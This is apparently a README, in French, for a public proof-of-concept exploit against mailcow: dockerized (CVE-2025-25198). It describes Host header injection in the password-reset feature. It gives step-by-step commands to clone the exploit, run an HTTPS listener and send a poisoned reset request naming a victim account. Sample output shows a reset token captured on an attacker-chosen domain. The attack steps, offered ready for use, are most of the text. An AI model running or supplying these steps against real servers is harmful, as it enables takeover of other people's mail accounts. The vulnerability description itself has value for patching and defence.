
Capture les jetons de réinitialisation de mot de passe lors d'attaques par injection d'en-tête Host sur Mailcow.
mailcow: dockerized est une suite de messagerie/groupware open source basée sur Docker. Avant la version 2025-01a, une vulnérabilité dans la fonctionnalité de réinitialisation de mot de passe de mailcow permet à un attaquant de manipuler l'en-tête Host HTTP pour générer un lien de réinitialisation de mot de passe pointant vers un domaine contrôlé par l'attaquant. Cela peut conduire à une prise de contrôle du compte si un utilisateur clique sur le lien empoisonné.
Configure un serveur HTTPS pour écouter toutes les requêtes et envoie une requête POST au site web avec l'en-tête Host contenant votre choisie. Vous pouvez également utiliser Burpsuite pour envoyer la requête et obtenir le jeton sur le serveur.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optionnel >
Après avoir attendu un peu, le serveur affichera le jeton que vous pouvez utiliser :
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245